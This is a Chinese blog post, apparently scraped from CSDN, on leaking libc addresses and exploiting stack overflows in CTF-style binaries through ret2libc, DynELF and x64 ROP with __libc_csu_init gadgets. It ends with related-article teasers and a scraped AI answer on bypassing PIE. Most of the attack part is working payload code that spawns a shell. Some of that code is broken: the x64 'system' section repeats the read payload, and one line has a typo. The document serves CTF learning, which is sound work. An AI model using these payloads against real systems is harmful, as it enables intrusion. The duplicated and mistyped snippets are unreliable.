泄露地址和利用总结

最新推荐文章于 2025-03-02 19:29:00 发布
最新推荐文章于 2025-03-02 19:29:00 发布
阅读量917 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/bme314/article/details/95869819

已知libc.so

栈执行保护---------->调用libc.so system("/bin/sh")
关闭ASLR system在内存中的地址不会变化

如果elf中调用了print和read,那么我们就可以搜索内存直接调用。
如果开启ASLR, 我们可以根据got得到print@plt和system在libc.so中的偏移得到system
的地址。

read@plt write@plt 以及相关的got可以在调用的程序中通过elf格式搜索位置。因为程序本身的地址是不变化的。

当然 /bin/sh 字符串也可以在libc.so中的到。

所以关键就是得到libc.so的偏移。也就是突破aslr.

1.溢出点位置测试,
1) python pattern.py create 150生成字符串
2) python pattren.py offset 0x37654136
140

..........................................................................                                           低地址
                                                                                                                        +
                                                                                                                        +       	
 esp--->	buf->........                 //局部变量,保存的寄存器                             +              <-+
	                     .......                                                                                        +                 +
 esp--->  ebp   保存的ebp        //offset   0x37654136    140                            +                 +
   	                    ret                    //                                   144                             +            [esp-144]
   	                   参数1                                                                                        +
    	               参数2                                                                                        +
      	               参数.....                                                                                     +
.......................................................................                                          高地址

ssize_t write(int fd,const void *buf,size_t nbytes)

payload1 = ‘a’*140+p32(plt_wrtie)+p32(vulfun_addr)+p32(1)+p32(got_write)

..........................................................................                              低地址
                                                                                                           +
                                                                                                           +       	
 esp--->	buf->........                 //'a'*140                                             +              <-+
	                    .......                                                                            +                 +
 esp--->  ebp   保存的ebp        //                                                         +
   	                    ret                    //            p32(plt_wrtie)  //可调用         +             [esp-144]
   	                    参数1                               p32(vulfun_addr)                 +      //ret指向新函数增加一个返回函数
    	                参数2                               p32(1)                                 +
      	                参数.....                             p32(got_write)                    + 
                        .......                                  p32(4)
.......................................................................                               高地址

write_addr = p32.(p.recv(4))

system_addr = write_addr - (libc.symbols[‘write’]-libc.symbols[‘system’])

payload2 = ‘a’*140 + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr)

小结

这里构造栈的时候有一个注意点,因为完整的调用栈是返回地址,参数1,2,3.这样子。当我们把返回地址参数覆盖的时候。程序返回的那个时刻,esp到了原来参数1的位置。eip跳转到了ret被覆盖的位置。那么此时栈的数据中,原来参数1所在的位置将会是此时新栈的ret地址。原来参数2,3,4的位置将会变成新函数栈参数1,2,3对应的位置。

不知道libc.so

d = DynELF(leak, elf=ELF('./level2'))
system_addr = d.lookup('system', 'libc')

.bss段是用来保存全局变量的值的,地址固定,并且可以读可写。

bss_addr = 0x0804a020
pppr = 0x804855d

payload2 = 'a'*140  + p32(plt_read) + p32(pppr) + p32(0) + p32(bss_addr) + p32(8)   //read三个参数
payload2 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr)
p.send(payload2)
p.send("/bin/sh\0")

64位溢出

linux_x64_ROP
x86中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,程序使用的内存地址不能大于0x00007fffffffffff
libc.so __libc_csu_init()

  4005f0:   4c 89 fa                mov    %r15,%rdx                                      <----------------------------
  4005f3:   4c 89 f6                mov    %r14,%rsi
  4005f6:   44 89 ef                mov    %r13d,%edi
  4005f9:   41 ff 14 dc             callq  *(%r12,%rbx,8)
  4005fd:   48 83 c3 01             add    $0x1,%rbx
  400601:   48 39 eb                cmp    %rbp,%rbx
  400604:   75 ea                   jne    4005f0 <__libc_csu_init+0x50>
  400606:   48 8b 5c 24 08          mov    0x8(%rsp),%rbx                         <----------------------------
  40060b:   48 8b 6c 24 10          mov    0x10(%rsp),%rbp
  400610:   4c 8b 64 24 18          mov    0x18(%rsp),%r12
  400615:   4c 8b 6c 24 20          mov    0x20(%rsp),%r13
  40061a:   4c 8b 74 24 28          mov    0x28(%rsp),%r14
  40061f:   4c 8b 7c 24 30          mov    0x30(%rsp),%r15
  400624:   48 83 c4 38             add    $0x38,%rsp
  400628:   c3                      retq

write write.got

#!bash
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#write(rdi=1, rsi=write.got, rdx=4)
payload1 =  "\x00"*136
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(got_write) + p64(1) + p64(got_write) + p64(8) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload1 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload1 += "\x00"*56
payload1 += p64(main)

read /bin/sh

#!bash
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 =  "\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(got_read) + p64(0) + p64(bss_addr) + p64(16) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload2 += "\x00"*56
payload2 += p64(main)

system

#!bash
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 =  "\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(got_read) + p64(0) + p64(bss_addr) + p64(16) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload2 += "\x00"*56
payload2 += p64(main)
二进制安全之——栈相关漏洞
PICACHU+++的博客
09-22 1983
栈主要是用于存储程序运行过程中的局部信息,大小不一,动态增长。栈的内存一般根据函数栈来进行划分(不用函数的程序很少见),不同的函数栈之间是互相隔离的,从而能实现函数的有效切换。函数栈上存储的信息一般包括:临时变量(包括栈保护哨carry)、函数栈的返回栈基址(bp)、函数的返回地址(ip)。
Git信息泄露原理解析及利用总结
wulanlin的博客
01-10 1万+
前言 最近,在一些人聊天的过程中发现,好多人可以很从容淡定的说出信息收集需要收集Git信息泄露,至于深入的去谈这个漏洞产生的原理时,貌似不太直到这个问题以及相关工具的原理是什么?但作为小白的我始终觉得,对于一个问题只有深入的了解它的原理,并且利用的核心思想才能更好的挖掘利用它。(可能思想有些“吹毛求疵”了,欢迎大佬们来指教) 那这篇文章,我就尝试从原理上分析一下这个漏洞以及漏洞的利用思想吧!(当然,借鉴了很多前辈的文章,感谢前辈们的分享) 一、Git简介 官方给出的解释是:Git是一个开源的分布
environ泄露地址+orw+uaf
FUCKING12的博客
10-08 801
这个题开了沙箱,有uaf。利用思路:借助environ泄露地址利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
Buuctf(pwn) ez_pz_hackover_2016 泄露地址,retshellcode;调试计算
半岛铁盒的博客
08-13 1428
32位,开启了RELRO保护,堆栈地址随机化 没有开启nx保护,可利用写入shellcode来获取shell 一开始给我们输出了参数s的地址 strcmp函数: 两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇’\0’为止 也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查,之后执行vuln函数 dest大小根本不是0x32,要动态调试看大小其实是 0x16 利用思路: 1.往s参数里写入shellcode,执行vuln函数后让dest造成溢出
栈泄漏实践报告
qq_24599583的博客
10-09 774
0x00 栈溢出是啥呀! 栈溢出是指在栈内写入超出长度限制的数据,从而破坏程序运行甚至获得系统控制权的攻击手段。 例如:read(0, buf, 80); 要想栈溢出,我们????️满足两个条件。 第一,程序要有向栈写入数据的行为; 第二,程序并不限制写入数据的长度。 我们知道,UNIX本身以及其上的许多应用程序都是用C语言编写的,C语言不检查缓冲区的边界。在某些情况下,如果用户输入的数据长度超过应用程序给定的缓冲区,就会覆盖其他数据区。这称作“堆栈溢出或缓冲溢出”。 如果想用栈溢出来执行攻击指令,就要在溢
堆技巧 数组反向越界泄露地址
tbsqigongzi的博客
09-02 367
痛苦痛苦痛苦,调了半天才找到数组起始地址,还是自己太菜了,好好记录一下这题题目给了libc,2.31的题嗯,可以考虑覆盖got表或者hook函数打开ida发现是c++的题,认真分析一下。
可造成敏感信息泄露!Spring Boot之Actuator信息泄露漏洞三种利用方式总结
m0_67392010的博客
03-02 1060
Spring Boot是一个基于Spring的套件,它提供了一个即开即用的应用程序架构,可以简化Spring应用的创建及部署流程,帮助开发者更轻松快捷地构建出企业及应用。Spring Boot项目中Actuator模块提供了众多HTTP接口端点(Endpoint),来提供应用程序运行时的内部状态信息。可以使用http、jmx、ssh、telnet等来管理监控应用。包括应用的审计(Auditing)、健康(health)状态信息、数据采集(metrics gathering)统计等监控运维的功能。
威胁情报技战法总结 红队利用企业泄露的敏感信息或暴露的资产进行攻击,蓝队利用情报收缩攻击面 红队利用钓鱼邮件感染控制内部主机
09-28
红队,模拟攻击者,利用企业敏感信息的泄露暴露的资产发起攻击,而蓝队则通过情报分析来收缩攻击面,增强防御。这种对抗体现在以下几个方面: 1. **红队利用企业泄露的敏感信息或暴露的资产攻击** - 红队通过...
奇怪,为什么他的一次溢出可以同时做到泄露地址挟持程序流啊?(这应该算是特例?浅讲一下原理)
m0_73858054的博客
03-19 814
这是一道SROP类型题目,刚开始不知道怎么下手,看了这位师傅@的wp之后感到很震惊,仔细研究一下发现其实原理很简单,只要看一下题目的汇编代码就很好懂。发觉自己应该多看一眼汇编才可能对漏洞利用的原理多一分理解,思来想去决定特此额外记录一份。
堆,栈,内存泄露,内存溢出介绍
u013485792的专栏
05-04 1733
简单的可以理解为: heap(堆):是由malloc之类函数分配的空间所在地。地址是由低向高增长的。 stack(栈):是自动分配变量,以及函数调用的时候所使用的一些空间。地址是由高向低减少的。 一、预备知识—程序的内存分配 一个由c/C++编译的程序占用的内存分为以下几个部分 1、栈区(stack)— 由编译器自动分配释放 ,存放函数的参数值,局部变量的值等。其操作方式类似于数据结
初探ROP
KKABqN
03-16 3659
文章目录0x01 前言0x02 什么是ROP0x03 为什么要ROP0x04 基本ROPret2shellcode含义从原理中解析ret2shellcode从例子中解析ret2shellcode发现利用点确定利用前提调试扩展点ret2text含义从例子中解析ret2text发现利用点确定利用前提调试ret2syscall含义从例子中解析ret2syscall的方法细说系统调用在ret2syscal......
内存安全试验:ret2libc绕过DEP另一个例子
weixin_42072280的博客
05-09 907
关于ret2libc的实验原理见我的另一篇博客:https://mp.youkuaiyun.com/postedit/89948519 这是ret2libc的又一个例子 这个例子之前的那个例子区别主要是:之前的那个例子漏洞程序攻击程序是分开的,而这个实验是在一个程序里面实现的。 虽然看似比之前的那个简单,但是还是遇到了很多问题,现一一记录下来,供自己查阅,也供他人学习。 ...
2019.7.24 64位程序libc泄露 x64_3
DSR446的博客
08-17 696
1.这是程序,程序中没有system函数也没有/bin/sh字符串,但是函数中有read函数。我们有一下几种解法。①我们用LibcSearcher这个模块进行解题②打本地的时候,我们可以在gdb中,用vmmap指令来找到动态链接库的绝对路径,然后用elf = ELF(‘绝对路径’),来算偏移③我们也可以用ldd指令找到相对路径,然后拷贝到当前路径,然后用ipython,用elf = ELF(‘li...
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 783
pwn 64位 泄露libc版本
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 6609
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
使用ret2libc攻击方法绕过数据执行保护
热门推荐
海枫的专栏
02-08 2万+
本文介绍ret2libc攻击方法,可以绕过栈执行保护安全机制
linux中ret2libc入门与实践
counsellor的专栏
08-23 7004
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
信息泄露漏洞
cxrpty的博客
03-04 6372
信息泄露主要包括:敏感路径、服务器、中间件、框架版本等 实验环境:ubuntu 实验原理: 配置存放不当,导致web系统备份,数据库备份 用户数据文件,暴露在web系统上,引发信息泄露 实验内容: 一、目录遍历漏洞 原理:index文件是web应用程序的默认入口文件被称为索引文件。访问web应用程序时如果没有 指定某个文件,web应用程序就会调用索引文件。根据web开发脚本...
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 2457
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 记录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl
开启了pie保护并且程序没有泄露地址怎么利用
最新发布
03-04
<think>嗯,用户问的是在开启PIE(Position-Independent Executable)保护且程序没有泄露地址的情况下如何进行漏洞利用。这个问题看起来属于二进制利用的范畴,尤其是在现代安全机制下如何绕过保护措施。首先,我需要回顾一下PIE的作用常见漏洞利用方法,再结合没有栈地址泄露的情况来思考可能的利用途径。 首先,PIE保护使得程序每次运行时,代码段的基地址都会随机化,包括.text、.plt等段。这样攻击者无法直接使用固定的地址来跳转到特定的函数或gadgets。而如果程序没有泄露地址,传统的栈溢出利用中需要覆盖返回地址或构造ROP链的方法可能会遇到困难,因为攻击者不知道栈的具体位置,难以准确定位shellcode或伪造的栈结构。 接下来,我需要考虑在这种情况下可能的攻击面。例如,是否有其他信息泄露的可能,或者是否存在非栈相关的漏洞利用方式。比如,如果存在堆溢出或格式化字符串漏洞,即使没有栈地址泄露,也可能通过其他方式获取基地址或绕过PIE。 假设程序存在缓冲区溢出漏洞,但无法泄露地址,那么可能需要寻找其他方法来绕过PIE。比如,如果存在部分地址泄露,如某个函数的地址,可以通过计算偏移来确定基地址。但用户明确提到没有栈地址泄露,所以可能需要其他途径。 另外,考虑是否有可用的信息泄露漏洞。例如,如果程序在崩溃时输出某些寄存器的内容或部分内存内容,可能利用这些信息来计算基地址。或者,是否存在其他漏洞如Use After Free(UAF)或信息泄露漏洞,可以间接获取到代码段的地址。 如果程序完全没有泄露任何地址,包括堆地址或库函数地址,那么可能需要采用盲攻击的方式,比如通过多次尝试或侧信道攻击来推测基地址。不过这种方法成功率较低,尤其是在ASLR(地址空间布局随机化)较强的情况下。 另外,考虑是否可以构造一个部分覆盖的攻击。例如,在覆盖返回地址时,PIE的随机化通常会影响地址的高位字节,而低位字节可能相对固定。如果溢出漏洞允许精确覆盖部分地址,可能通过修改低位字节来跳转到附近的gadget,如函数内部的某个位置。例如,某个函数的返回地址可能被修改为同一函数内的一个pop-ret指令,用于构造ROP链。 此外,如果程序没有开启其他保护措施,如Canary保护,可能结合栈溢出修改局部变量或函数指针,如通过覆盖存储在堆或全局变量中的函数指针(例如GOT表,但PIE下GOT地址也是随机的)。不过GOT表在开启PIE的情况下同样会被随机化,所以可能需要先泄露GOT地址才能修改。 另一个可能性是使用面向返回编程(ROP),但需要先确定代码段的基地址。如果没有任何泄露,这种方法可能不可行。因此,可能需要结合其他漏洞来获取基地址,比如通过格式化字符串漏洞读取内存中的某个指针,或者利用堆漏洞获取某个对象的地址,进而计算出基地址。 总结可能的步骤: 1. 寻找信息泄露漏洞,获取代码段或库的基地址。 2. 如果没有直接泄露,尝试部分覆盖或利用固定偏移的gadgets。 3. 使用多次尝试(爆破)基地址,如果可能的化。 4. 结合其他漏洞类型,如堆溢出、UAF等,构造利用链。 比如,如果存在堆溢出,并且可以覆盖某个函数指针(如析构函数、回调函数等),可能需要先通过堆布局来预测或控制该指针的位置,然后将其指向已有的gadget。但由于PIE的存在,需要知道gadget的地址,这又回到了需要基地址的问题。 或者,如果程序中有非PIE的部分,如某些库未被编译为PIE,可能利用其中的gadgets,但现代系统通常所有库都启用ASLR。 可能还有一种情况是,如果程序存在可预测的地址,比如某些情况下,虽然PIE启用,但随机化范围有限,可能通过爆破来猜测基地址。例如,在32位系统中,地址空间较小,可能可行,但在64位系统中,地址空间巨大,这种方法不现实。 另外,考虑是否可以通过覆盖.got.plt表中的条目,但需要知道.got.plt地址,这同样需要基地址。或者,如果程序调用了某些库函数,可以通过覆盖GOT中的函数地址,但同样需要先泄露地址。 如果所有方法都无法泄露地址,可能需要重新审视漏洞是否存在其他利用方式,比如通过覆盖栈上的局部变量改变程序逻辑,而不直接控制执行流。例如,修改一个存储长度的变量,导致后续的堆溢出或信息泄露。 或者,利用程序中的逻辑漏洞,结合内存破坏漏洞,逐步构造利用链。例如,先通过溢出修改某个指针,使其指向可控数据,再通过该指针进行进一步的读写操作,从而泄露地址或执行代码。 总之,关键点在于如何在缺乏栈地址代码段基地址的情况下,找到信息泄露的途径或找到无需绝对地址利用方法。这可能需要对目标程序进行深入分析,寻找其他漏洞的配合使用。</think>在开启PIE(位置无关可执行文件)保护且无栈地址泄露的情况下,漏洞利用需结合其他技术手段。以下是分步骤的技术分析: --- ### **1. 理解PIE的保护机制** - **PIE的作用**:每次运行时,程序基地址(如代码段、GOT表)随机化,攻击者无法硬编码地址。 - **关键限制**:需泄露代码段基地址或找到无需绝对地址利用方式。 --- ### **2. 漏洞利用核心思路** #### **思路1:间接信息泄露** - **目标**:通过非栈地址泄露获取基地址。 - **可能途径**: - **堆漏洞利用**:若存在堆溢出/UAF,可能泄露堆中的函数指针(如虚表指针),结合偏移计算基地址。 - **格式化字符串漏洞**:读取程序内存中的残留指针(如`main`函数返回地址),推算代码段基地址。 - **侧信道攻击**:通过程序崩溃差异推测内存布局(成功率低)。 #### **思路2:部分地址覆盖(Partial Overwrite)** - **原理**:PIE随机化高位字节,低位字节可能固定(如函数内偏移)。 - **示例**:覆盖返回地址的低2字节,跳转到`main`函数内部的`pop rdi; ret` gadget。 - **条件**:溢出漏洞需精准控制覆盖位置,且目标gadget低位偏移已知。 #### **思路3:非控制流劫持利用** - **修改关键数据**:覆盖栈/堆中的敏感变量(如身份校验标志、循环计数器)。 - **示例**:修改栈上的`is_admin`变量为`1`,绕过权限检查。 #### **思路4:组合漏洞利用** - **分阶段攻击**: 1. **阶段一**:通过漏洞A(如堆溢出)篡改指针,构造可控读写原语。 2. **阶段二**:利用可控读写泄露GOT表地址,计算基地址。 3. **阶段三**:构造ROP链调用`system("/bin/sh")`。 --- ### **3. 具体利用场景示例** #### **场景:存在栈溢出 + 可泄露libc地址** 1. **泄露libc基地址**: - 通过覆盖返回地址为`printf@plt`,泄露libc中的地址(如`printf`的实际地址)。 - 计算libc基地址:`libc_base = leaked_printf_addr - libc.symbols["printf"]`。 2. **构造ROP链**: - 即使PIE开启,libc基地址已知后,可直接使用libc中的gadgets(如`system`、`/bin/sh`字符串)。 #### **场景:无泄露 + 部分覆盖** 1. **定位固定偏移gadget**: - 反编译程序,找到函数内部的短gadget(如`0x1234`处的`ret`指令)。 2. **覆盖返回地址低位**: - 假设基地址随机化范围为`0x55...0000`,覆盖返回地址为`0x55...1234`,跳转到`ret`指令。 3. **堆栈平衡**:通过多次`ret`滑动到可控内存区域执行shellcode(需NX关闭)。 --- ### **4. 缓解措施与绕过限制** - **若同时开启NX**:需转向ROP,依赖libc或其他段的gadgets。 - **若存在Canary**:需先泄露Canary值或绕过Canary检查(如覆盖非返回地址数据)。 --- ### **5. 总结** - **关键点**:通过组合漏洞(信息泄露 + 内存破坏)或部分覆盖,间接绕过PIE。 - **难点**:精准控制覆盖位置、预测/泄露地址。 - **工具辅助**:使用`pwntools`的`PIE`偏移计算功能,或动态调试获取运行时偏移。 --- **示例Payload构造(部分覆盖)**: ```python # 假设 vuln_func 的返回地址低位为 0x1234 payload = b"A" * offset + p16(0x1234) ``` 通过以上方法,即使PIE开启且无栈泄露,仍可能实现漏洞利用,但技术门槛较高,需结合目标程序的上下文环境灵活调整。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值